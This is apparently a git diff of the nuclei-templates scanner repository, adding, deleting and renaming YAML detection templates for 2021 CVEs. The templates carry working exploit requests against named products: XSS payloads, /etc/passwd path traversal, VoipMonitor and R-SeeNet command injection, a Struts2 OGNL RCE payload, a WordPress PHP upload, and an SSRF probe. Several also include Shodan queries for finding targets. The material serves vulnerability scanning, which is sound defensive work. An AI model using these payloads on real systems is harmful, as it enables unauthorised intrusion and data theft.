parameter to a cgi/dataset_ dictionary URI. - reference: - - https://github.com/grymer/CVE/blob/master/eprints_security_review.pdf - - https://files.eprints.org/2548/ - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2021-26702 - cwe-id: CWE-79 - tags: cve,cve2021,xss,eprints -requests: - - method: GET - path: - - "{{BaseURL}}/cgi/dataset_dictionary?dataset=zulu%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - matchers-condition: and - matchers: - - type: word - words: - - "" - - type: word - part: header - words: - - "text/html" - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2021/cve-2021-26812.yaml b/nuclei-templates/CVE-2021/CVE-2021-26812.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-26812.yaml rename to nuclei-templates/CVE-2021/CVE-2021-26812.yaml diff --git a/nuclei-templates/CVE-2021/cve-2021-27310.yaml b/nuclei-templates/CVE-2021/CVE-2021-27310.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-27310.yaml rename to nuclei-templates/CVE-2021/CVE-2021-27310.yaml diff --git a/nuclei-templates/CVE-2021/cve-2021-27358.yaml b/nuclei-templates/CVE-2021/CVE-2021-27358.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-27358.yaml rename to nuclei-templates/CVE-2021/CVE-2021-27358.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-27519.yaml b/nuclei-templates/CVE-2021/CVE-2021-27519.yaml deleted file mode 100644 index 97b1350cae..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-27519.yaml +++ /dev/null @@ -1,38 +0,0 @@ -id: CVE-2021-27519 -info: - name: FUDForum 3.1.0 - Reflected XSS - author: kh4sh3i - severity: medium - description: | - A cross-site scripting (XSS) issue in FUDForum 3.1.0 allows remote attackers to inject JavaScript - reference: - - https://www.exploit-db.com/exploits/49942 - - https://nvd.nist.gov/vuln/detail/CVE-2021-27519 - - https://github.com/fudforum/FUDforum/issues/2 - - http://packetstormsecurity.com/files/162942/FUDForum-3.1.0-Cross-Site-Scripting.html - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2021-27519 - cwe-id: CWE-79 - metadata: - shodan-query: 'http.html:"Powered by: FUDforum"' - verified: "true" - tags: cve,cve2021,xss,fudforum -requests: - - method: GET - path: - - '{{BaseURL}}/index.php?SQ=0&srch=x"+onmouseover%3Dalert%281%29+x%3D"&t=search&btn_submit.x=0&btn_submit.y=0' - matchers-condition: and - matchers: - - type: word - part: body - words: - - 'highlightSearchTerms("x" onmouseover=alert(1) x="");' - - type: word - part: header - words: - - text/html - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2021/CVE-2021-27748.yaml b/nuclei-templates/CVE-2021/CVE-2021-27748.yaml new file mode 100644 index 0000000000..23f9aef7c7 --- /dev/null +++ b/nuclei-templates/CVE-2021/CVE-2021-27748.yaml @@ -0,0 +1,33 @@ +id: CVE-2021-27748 +info: + name: IBM WebSphere HCL Digital Experience - Server-Side Request Forgery + author: pdteam + severity: high + description: | + IBM WebSphere HCL Digital Experience is susceptible to server-side request forgery vulnerability that impacts on-premise deployments and containers. + reference: + - https://blog.assetnote.io/2021/12/26/chained-ssrf-websphere/ + - https://support.hcltechsw.com/csm?id=kb_article&sysparm_article=KB0095665 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27748 + classification: + cve-id: CVE-2021-27748 + metadata: + verified: true + shodan-query: http.html:"IBM WebSphere Portal" + tags: cve,cve2021,hcl,ibm,ssrf,websphere +requests: + - method: GET + path: + - '{{BaseURL}}/docpicker/internal_proxy/http/interact.sh' + - '{{BaseURL}}/wps/PA_WCM_Authoring_UI/proxy/http/interact.sh' + redirects: true + max-redirects: 2 + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + words: + - "Interactsh Server" + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2021/cve-2021-27850.yaml b/nuclei-templates/CVE-2021/CVE-2021-27850.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-27850.yaml rename to nuclei-templates/CVE-2021/CVE-2021-27850.yaml diff --git a/nuclei-templates/CVE-2021/cve-2021-28164.yaml b/nuclei-templates/CVE-2021/CVE-2021-28164.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-28164.yaml rename to nuclei-templates/CVE-2021/CVE-2021-28164.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-28377.yaml b/nuclei-templates/CVE-2021/CVE-2021-28377.yaml deleted file mode 100644 index d55e6fcef0..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-28377.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: CVE-2021-28377 -info: - name: ChronoForums 2.0.11 - Directory Traversal - author: 0x_Akoko - severity: medium - description: The ChronoForums avatar function is vulnerable through unauthenticated path traversal attacks. This enables unauthenticated attackers to read arbitrary files, for example the Joomla! configuration file which contains credentials. - reference: - - https://herolab.usd.de/en/security-advisories/usd-2021-0007/ - - https://nvd.nist.gov/vuln/detail/CVE-2021-28377 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.3 - cve-id: CVE-2021-28377 - cwe-id: CWE-22 - tags: cve,cve2021,chronoforums,lfi,joomla -requests: - - method: GET - path: - - "{{BaseURL}}/index.php/component/chronoforums2/profiles/avatar/u1?tvout=file&av=../../../../../../../etc/passwd" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2021/cve-2021-28918.yaml b/nuclei-templates/CVE-2021/CVE-2021-28918.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-28918.yaml rename to nuclei-templates/CVE-2021/CVE-2021-28918.yaml diff --git a/nuclei-templates/CVE-2021/cve-2021-29156.yaml b/nuclei-templates/CVE-2021/CVE-2021-29156.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-29156.yaml rename to nuclei-templates/CVE-2021/CVE-2021-29156.yaml diff --git a/nuclei-templates/CVE-2021/cve-2021-29622.yaml b/nuclei-templates/CVE-2021/CVE-2021-29622.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-29622.yaml rename to nuclei-templates/CVE-2021/CVE-2021-29622.yaml diff --git a/nuclei-templates/CVE-2021/cve-2021-29625.yaml b/nuclei-templates/CVE-2021/CVE-2021-29625.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-29625.yaml rename to nuclei-templates/CVE-2021/CVE-2021-29625.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-30461.yaml b/nuclei-templates/CVE-2021/CVE-2021-30461.yaml deleted file mode 100644 index 4f33512058..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-30461.yaml +++ /dev/null @@ -1,34 +0,0 @@ -id: CVE-2021-30461 -info: - name: VoipMonitor Pre-Auth-RCE - author: nithissh - severity: critical - description: A malicious actor can trigger Un authenticated Remote Code Execution using CVE-2021-30461. - tags: cve,cve2021,rce,voipmonitor - reference: https://ssd-disclosure.com/ssd-advisory-voipmonitor-unauth-rce/ -requests: - - raw: - - | - POST /index.php HTTP/1.1 - Host: {{Hostname}} - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 - Accept-Language: en-US,en;q=0.5 - Accept-Encoding: gzip, deflate - Connection: close - Content-Type: application/x-www-form-urlencoded - Content-Length: 35 - - SPOOLDIR=test".system(id)."&recheck=Recheck - matchers-condition: and - matchers: - - type: word - words: - - "uid=" - - "gid=" - - "groups=" - - "VoIPmonitor installation" - part: body - condition: and - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2021/CVE-2021-31805.yaml b/nuclei-templates/CVE-2021/CVE-2021-31805.yaml new file mode 100644 index 0000000000..8b70dbaa8d --- /dev/null +++ b/nuclei-templates/CVE-2021/CVE-2021-31805.yaml @@ -0,0 +1,48 @@ +id: CVE-2021-31805 +info: + name: Apache Struts2 S2-062 - Remote Code Execution + author: taielab + severity: critical + description: Apache Struts2 S2-062 is vulnerable to remote code execution. The fix issued for CVE-2020-17530 (S2-061) was incomplete, meaning some of the tag's attributes could still perform a double evaluation if a developer applied forced OGNL evaluation by using the %{...} syntax. + reference: + - https://cwiki.apache.org/confluence/display/WW/S2-062 + - https://github.com/Axx8/Struts2_S2-062_CVE-2021-31805 + - https://nvd.nist.gov/vuln/detail/CVE-2021-31805 + remediation: Avoid using forced OGNL evaluation on untrusted user input, and/or upgrade to Struts 2.5.30 or greater which checks if expression evaluation won't lead to the double evaluation. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2021-31805 + cwe-id: CWE-917 + tags: cve,cve2021,apache,rce,struts,struts2 +requests: + - raw: + - | + POST / HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryl7d1B1aGsV2wcZwF + Content-Length: 1095 + + ------WebKitFormBoundaryl7d1B1aGsV2wcZwF + Content-Disposition: form-data; name="id" + + %{ + (#request.map=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) + + (#request.map.setBean(#request.get('struts.valueStack')) == true).toString().substring(0,0) + + (#request.map2=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) + + (#request.map2.setBean(#request.get('map').get('context')) == true).toString().substring(0,0) + + (#request.map3=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) + + (#request.map3.setBean(#request.get('map2').get('memberAccess')) == true).toString().substring(0,0) + + (#request.get('map3').put('excludedPackageNames',#@org.apache.commons.collections.BeanMap@{}.keySet()) == true).toString().substring(0,0) + + (#request.get('map3').put('excludedClasses',#@org.apache.commons.collections.BeanMap@{}.keySet()) == true).toString().substring(0,0) + + (#application.get('org.apache.tomcat.InstanceManager').newInstance('freemarker.template.utility.Execute').exec({'cat /etc/passwd'})) + } + + ------WebKitFormBoundaryl7d1B1aGsV2wcZwF— + matchers: + - type: regex + part: body + regex: + - "root:.*:0:0:" + +# Enhanced by mp on 2022/04/21 diff --git a/nuclei-templates/CVE-2021/cve-2021-31856.yaml b/nuclei-templates/CVE-2021/CVE-2021-31856.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-31856.yaml rename to nuclei-templates/CVE-2021/CVE-2021-31856.yaml diff --git a/nuclei-templates/CVE-2021/cve-2021-31862.yaml b/nuclei-templates/CVE-2021/CVE-2021-31862.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-31862.yaml rename to nuclei-templates/CVE-2021/CVE-2021-31862.yaml diff --git a/nuclei-templates/CVE-2021/cve-2021-32853.yaml b/nuclei-templates/CVE-2021/CVE-2021-32853.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-32853.yaml rename to nuclei-templates/CVE-2021/CVE-2021-32853.yaml diff --git a/nuclei-templates/CVE-2021/cve-2021-33044.yaml b/nuclei-templates/CVE-2021/CVE-2021-33044.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-33044.yaml rename to nuclei-templates/CVE-2021/CVE-2021-33044.yaml diff --git a/nuclei-templates/CVE-2021/cve-2021-3378.yaml b/nuclei-templates/CVE-2021/CVE-2021-3378.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-3378.yaml rename to nuclei-templates/CVE-2021/CVE-2021-3378.yaml diff --git a/nuclei-templates/CVE-2021/cve-2021-33807.yaml b/nuclei-templates/CVE-2021/CVE-2021-33807.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-33807.yaml rename to nuclei-templates/CVE-2021/CVE-2021-33807.yaml diff --git a/nuclei-templates/CVE-2021/cve-2021-34621.yaml b/nuclei-templates/CVE-2021/CVE-2021-34621.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-34621.yaml rename to nuclei-templates/CVE-2021/CVE-2021-34621.yaml diff --git a/nuclei-templates/CVE-2021/cve-2021-35265.yaml b/nuclei-templates/CVE-2021/CVE-2021-35265.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-35265.yaml rename to nuclei-templates/CVE-2021/CVE-2021-35265.yaml diff --git a/nuclei-templates/CVE-2021/cve-2021-35336.yaml b/nuclei-templates/CVE-2021/CVE-2021-35336.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-35336.yaml rename to nuclei-templates/CVE-2021/CVE-2021-35336.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-36450.yaml b/nuclei-templates/CVE-2021/CVE-2021-36450.yaml deleted file mode 100644 index 7220501c25..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-36450.yaml +++ /dev/null @@ -1,55 +0,0 @@ -id: CVE-2021-36450 -info: - name: Verint 15.2 - Cross Site Scripting - author: atomiczsec - severity: medium - description: Verint Workforce Optimization (WFO) 15.2.8.10048 allows XSS via the control/my_notifications NEWUINAV parameter. - reference: - - https://medium.com/@1nf0sk/cve-2021-36450-cross-site-scripting-xss-6f5d8d7db740 - - https://sushantvkamble.blogspot.com/2021/11/cross-site-scripting-xss.html - - https://nvd.nist.gov/vuln/detail/CVE-2021-36450 - - http://verint.com - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2021-36450 - cwe-id: CWE-79 - metadata: - shodan-query: title:"Verint Sign-in" - verified: "true" - tags: cve,cve2021,xss,verint -requests: - - raw: - - | - GET /wfo/control/signin?rd=%2Fwfo%2Fcontrol%2Fmy_notifications%3FNEWUINAV%3D%22%3E%3Ch1%3ETest%3C%2Fh1%3E26 HTTP/1.1 - Host: {{Hostname}} - - | - POST /wfo/control/signin?rd=%2Fwfo%2Fcontrol%2Fmy_notifications%3FNEWUINAV%3D%22%3E%3Ch1%3ETest%3Ch1%3E%26 HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - browserCheckEnabled=true&username=admin&language=en_US&defaultHttpPort=80&screenHeight=1080&screenWidth=1920&pageModelType=0&pageDirty=false&pageAction=Login&csrfp_login={{csrfp_login}} - redirects: true - max-redirects: 2 - cookie-reuse: true - extractors: - - type: regex - part: header - internal: true - name: csrfp_login - group: 1 - regex: - - 'csrfp_login=([a-zA-Z0-9]+);' - matchers-condition: and - matchers: - - type: word - part: body - words: - - '">

Test

26" class="loginUserNameText' - - type: word - part: header - words: - - text/html - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2021/cve-2021-37833.yaml b/nuclei-templates/CVE-2021/CVE-2021-37833.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-37833.yaml rename to nuclei-templates/CVE-2021/CVE-2021-37833.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-39211.yaml b/nuclei-templates/CVE-2021/CVE-2021-39211.yaml new file mode 100644 index 0000000000..0847c7cf42 --- /dev/null +++ b/nuclei-templates/CVE-2021/CVE-2021-39211.yaml @@ -0,0 +1,31 @@ +id: CVE-2021-39211 +info: + name: GLPI Telemetry Disclosure + author: dogasantos,noraj + severity: medium + description: GLPI => 9.2 and < 9.5.6, the telemetry endpoint discloses GLPI and server information. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2021-39211 + - https://github.com/glpi-project/glpi/security/advisories/GHSA-xx66-v3g5-w825 + - https://github.com/glpi-project/glpi/releases/tag/9.5.6 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2021-39211 + cwe-id: CWE-668,CWE-200 + tags: cve,cve2021,glpi,exposure +requests: + - method: GET + path: + - "{{BaseURL}}/ajax/telemetry.php" + - "{{BaseURL}}/glpi/ajax/telemetry.php" + matchers-condition: and + matchers: + - type: word + words: + - '"uuid":' + - '"glpi":' + condition: and + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2021/cve-2021-39316.yaml b/nuclei-templates/CVE-2021/CVE-2021-39316.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-39316.yaml rename to nuclei-templates/CVE-2021/CVE-2021-39316.yaml diff --git a/nuclei-templates/CVE-2021/cve-2021-39327.yaml b/nuclei-templates/CVE-2021/CVE-2021-39327.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-39327.yaml rename to nuclei-templates/CVE-2021/CVE-2021-39327.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-40149.yaml b/nuclei-templates/CVE-2021/CVE-2021-40149.yaml deleted file mode 100644 index 22c1d83310..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-40149.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: CVE-2021-40149 -info: - name: Reolink E1 Zoom Camera <=3.0.0.716 - Private Key Disclosure - author: For3stCo1d - severity: high - description: | - Reolink E1 Zoom Camera versions 3.0.0.716 and below suffer from a private key (RSA) disclosure vulnerability. - reference: - - https://dl.packetstormsecurity.net/2206-exploits/reolinke1key-disclose.txt - - https://github.com/MrTuxracer/advisories/blob/master/CVEs/CVE-2021-40149.txt - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40149 - classification: - cve-id: CVE-2021-40149 - metadata: - shodan-query: http.title:"Reolink" - verified: "true" - tags: cve,cve2021,reolink,camera,iot,exposure,unauth -requests: - - method: GET - path: - - "{{BaseURL}}/self.key" - matchers-condition: and - matchers: - - type: word - words: - - "-----BEGIN RSA PRIVATE KEY-----" - - "-----END RSA PRIVATE KEY----" - condition: and - - type: status - status: - - 200 - -# Enhanced by mp on 2022/06/30 diff --git a/nuclei-templates/CVE-2021/cve-2021-40856.yaml b/nuclei-templates/CVE-2021/CVE-2021-40856.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-40856.yaml rename to nuclei-templates/CVE-2021/CVE-2021-40856.yaml diff --git a/nuclei-templates/CVE-2021/cve-2021-40978.yaml b/nuclei-templates/CVE-2021/CVE-2021-40978.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-40978.yaml rename to nuclei-templates/CVE-2021/CVE-2021-40978.yaml diff --git a/nuclei-templates/CVE-2021/cve-2021-41174.yaml b/nuclei-templates/CVE-2021/CVE-2021-41174.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-41174.yaml rename to nuclei-templates/CVE-2021/CVE-2021-41174.yaml diff --git a/nuclei-templates/CVE-2021/cve-2021-41467.yaml b/nuclei-templates/CVE-2021/CVE-2021-41467.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-41467.yaml rename to nuclei-templates/CVE-2021/CVE-2021-41467.yaml diff --git a/nuclei-templates/CVE-2021/cve-2021-41649.yaml b/nuclei-templates/CVE-2021/CVE-2021-41649.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-41649.yaml rename to nuclei-templates/CVE-2021/CVE-2021-41649.yaml diff --git a/nuclei-templates/CVE-2021/cve-2021-42237.yaml b/nuclei-templates/CVE-2021/CVE-2021-42237.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-42237.yaml rename to nuclei-templates/CVE-2021/CVE-2021-42237.yaml diff --git a/nuclei-templates/CVE-2021/cve-2021-42258.yaml b/nuclei-templates/CVE-2021/CVE-2021-42258.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-42258.yaml rename to nuclei-templates/CVE-2021/CVE-2021-42258.yaml diff --git a/nuclei-templates/CVE-2021/cve-2021-43495.yaml b/nuclei-templates/CVE-2021/CVE-2021-43495.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-43495.yaml rename to nuclei-templates/CVE-2021/CVE-2021-43495.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-44077.yaml b/nuclei-templates/CVE-2021/CVE-2021-44077.yaml deleted file mode 100644 index 738964414c..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-44077.yaml +++ /dev/null @@ -1,32 +0,0 @@ -id: CVE-2021-44077 -info: - name: Zoho ManageEngine ServiceDesk Plus - Remote Code Execution - author: Adam Crosser,gy741 - severity: critical - description: Zoho ManageEngine ServiceDesk Plus before 11306, ServiceDesk Plus MSP before 10530, and SupportCenter Plus before 11014 are vulnerable to unauthenticated remote code execution. - reference: - - https://www.cisa.gov/uscert/ncas/alerts/aa21-336a - - https://unit42.paloaltonetworks.com/tiltedtemple-manageengine-servicedesk-plus/ - - https://github.com/horizon3ai/CVE-2021-44077 - - https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/http/manageengine_servicedesk_plus_cve_2021_44077.rb - - https://nvd.nist.gov/vuln/detail/CVE-2021-44077 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2021-44077 - cwe-id: CWE-287 - tags: cve,cve2021,zoho,manageengine,rce,kev -requests: - - method: GET - path: - - "{{BaseURL}}/RestAPI/ImportTechnicians" - matchers-condition: and - matchers: - - type: word - words: - - '
' + - 'Send Access Request URL' + condition: and + +# Enhanced by md on 2022/09/02 diff --git a/nuclei-templates/CVE-2021/CVE-2021-20158.yaml b/nuclei-templates/CVE-2021/cve-2021-20158.yaml similarity index 100% rename from nuclei-templates/CVE-2021/CVE-2021-20158.yaml rename to nuclei-templates/CVE-2021/cve-2021-20158.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-21307.yaml b/nuclei-templates/CVE-2021/cve-2021-21307.yaml similarity index 100% rename from nuclei-templates/CVE-2021/CVE-2021-21307.yaml rename to nuclei-templates/CVE-2021/cve-2021-21307.yaml diff --git a/nuclei-templates/CVE-2021/cve-2021-21799.yaml b/nuclei-templates/CVE-2021/cve-2021-21799.yaml deleted file mode 100644 index 3c93d2ef05..0000000000 --- a/nuclei-templates/CVE-2021/cve-2021-21799.yaml +++ /dev/null @@ -1,43 +0,0 @@ -id: CVE-2021-21799 - -info: - name: Advantech R-SeeNet 2.4.12 - Cross-Site Scripting - author: arafatansari - severity: medium - description: | - Advantech R-SeeNet 2.4.12 contains a reflected cross-site scripting vulnerability in the telnet_form.php script functionality. - reference: - - https://talosintelligence.com/vulnerability_reports/TALOS-2021-1270 - - https://nvd.nist.gov/vuln/detail/CVE-2021-21799 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2021-21799 - cwe-id: CWE-79 - metadata: - shodan-query: http.html:"R-SeeNet" - verified: "true" - tags: cve,cve2021,xss,r-seenet - -requests: - - method: GET - path: - - "{{BaseURL}}/php/telnet_form.php?hostname=%3C%2Ftitle%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Ctitle%3E" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "Telnet " - - - type: word - part: header - words: - - "text/html" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/09/02 diff --git a/nuclei-templates/CVE-2021/CVE-2021-21803.yaml b/nuclei-templates/CVE-2021/cve-2021-21803.yaml similarity index 100% rename from nuclei-templates/CVE-2021/CVE-2021-21803.yaml rename to nuclei-templates/CVE-2021/cve-2021-21803.yaml diff --git a/nuclei-templates/CVE-2021/cve-2021-21805.yaml b/nuclei-templates/CVE-2021/cve-2021-21805.yaml new file mode 100644 index 0000000000..7c6b7bea06 --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-21805.yaml @@ -0,0 +1,46 @@ +id: CVE-2021-21805 + +info: + name: Advantech R-SeeNet 2.4.12 - OS Command Injection + author: arafatansari + severity: critical + description: | + Advantech R-SeeNet 2.4.12 is susceptible to remote OS command execution via the ping.php script functionality. An attacker, via a specially crafted HTTP request, can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. + reference: + - https://talosintelligence.com/vulnerability_reports/TALOS-2021-1274 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21805 + - https://nvd.nist.gov/vuln/detail/CVE-2021-21805 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2021-21805 + cwe-id: CWE-78 + metadata: + shodan-query: http.html:"R-SeeNet" + verified: "true" + tags: cve,cve2021,rce,r-seenet + +requests: + - method: GET + path: + - "{{BaseURL}}/php/ping.php?hostname=|dir" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Ping |dir" + - "bottom.php" + condition: and + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 + +# Enhanced by md on 2022/10/06 diff --git a/nuclei-templates/CVE-2021/CVE-2021-21985.yaml b/nuclei-templates/CVE-2021/cve-2021-21985.yaml similarity index 100% rename from nuclei-templates/CVE-2021/CVE-2021-21985.yaml rename to nuclei-templates/CVE-2021/cve-2021-21985.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-22053.yaml b/nuclei-templates/CVE-2021/cve-2021-22053.yaml similarity index 100% rename from nuclei-templates/CVE-2021/CVE-2021-22053.yaml rename to nuclei-templates/CVE-2021/cve-2021-22053.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-22986.yaml b/nuclei-templates/CVE-2021/cve-2021-22986.yaml similarity index 100% rename from nuclei-templates/CVE-2021/CVE-2021-22986.yaml rename to nuclei-templates/CVE-2021/cve-2021-22986.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-23241.yaml b/nuclei-templates/CVE-2021/cve-2021-23241.yaml similarity index 100% rename from nuclei-templates/CVE-2021/CVE-2021-23241.yaml rename to nuclei-templates/CVE-2021/cve-2021-23241.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-24235.yaml b/nuclei-templates/CVE-2021/cve-2021-24235.yaml similarity index 100% rename from nuclei-templates/CVE-2021/CVE-2021-24235.yaml rename to nuclei-templates/CVE-2021/cve-2021-24235.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-24275.yaml b/nuclei-templates/CVE-2021/cve-2021-24275.yaml similarity index 100% rename from nuclei-templates/CVE-2021/CVE-2021-24275.yaml rename to nuclei-templates/CVE-2021/cve-2021-24275.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-24276.yaml b/nuclei-templates/CVE-2021/cve-2021-24276.yaml similarity index 100% rename from nuclei-templates/CVE-2021/CVE-2021-24276.yaml rename to nuclei-templates/CVE-2021/cve-2021-24276.yaml diff --git a/nuclei-templates/CVE-2021/cve-2021-24284.yaml b/nuclei-templates/CVE-2021/cve-2021-24284.yaml deleted file mode 100644 index 3f6dad51b2..0000000000 --- a/nuclei-templates/CVE-2021/cve-2021-24284.yaml +++ /dev/null @@ -1,71 +0,0 @@ -id: CVE-2021-24284 - -info: - name: WordPress Kaswara Modern VC Addons <=3.0.1 - Arbitrary File Upload - author: lamscun,pussycat0x,pdteam - severity: critical - description: | - WordPress Kaswara Modern VC Addons plugin through 3.0.1 is susceptible to an arbitrary file upload. The plugin allows unauthenticated arbitrary file upload via the uploadFontIcon AJAX action, which can be used to obtain code execution. The supplied zipfile is unzipped in the wp-content/uploads/kaswara/fonts_icon directory with no checks for malicious files such as PHP. - reference: - - https://wpscan.com/vulnerability/8d66e338-a88f-4610-8d12-43e8be2da8c5 - - https://github.com/advisories/GHSA-wqvg-8q49-hjc7 - - https://www.wordfence.com/blog/2021/04/psa-remove-kaswara-modern-wpbakery-page-builder-addons-plugin-immediately/ - - https://www.waltermairena.net/en/2021/04/25/0-day-vulnerability-in-the-plugin-kaswara-modern-vc-addons-plugin-what-can-i-do/ - - https://lifeinhex.com/kaswara-exploit-or-how-much-wordfence-cares-about-user-security/ - - https://nvd.nist.gov/vuln/detail/CVE-2021-24284 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2021-24284 - cwe-id: CWE-434 - tags: intrusive,unauth,fileupload,wpscan,cve,wordpress,wp-plugin,rce,cve2021,wp - -variables: - zip_file: "{{to_lower(rand_text_alpha(6))}}" - php_file: "{{to_lower(rand_text_alpha(2))}}.php" - php_cmd: "" - -requests: - - raw: - - | - POST /wp-admin/admin-ajax.php?action=uploadFontIcon HTTP/1.1 - Host: {{Hostname}} - Content-Type: multipart/form-data; boundary=------------------------d3be34324392a708 - - --------------------------d3be34324392a708 - Content-Disposition: form-data; name="fonticonzipfile"; filename="{{zip_file}}.zip" - Content-Type: application/octet-stream - - {{hex_decode('504B03040A0000000000FA73F454B2333E07140000001400000006001C00')}}{{php_file}}{{hex_decode('555409000366CBD76267CBD76275780B000104F50100000414000000')}}{{php_cmd}}{{hex_decode('0A504B01021E030A00000000002978F454E49BC1591300000013000000060018000000000001000000A48100000000')}}{{php_file}}{{hex_decode('555405000366CBD76275780B000104F50100000414000000504B050600000000010001004C000000530000000000')}} - --------------------------d3be34324392a708 - Content-Disposition: form-data; name="fontsetname" - - {{zip_file}} - --------------------------d3be34324392a708 - Content-Disposition: form-data; name="action" - - uploadFontIcon - --------------------------d3be34324392a708-- - - - | - GET /wp-content/uploads/kaswara/fonts_icon/{{zip_file}}/{{php_file}} HTTP/1.1 - Host: {{Hostname}} - - req-condition: true - matchers-condition: and - matchers: - - type: word - part: body_1 - words: - - "wp-content/uploads/kaswara/fonts_icon/{{zip_file}}/style.css" - - - type: word - part: body_2 - words: - - "phpinfo()" - - - type: status - status: - - 200 - -# Enhanced by 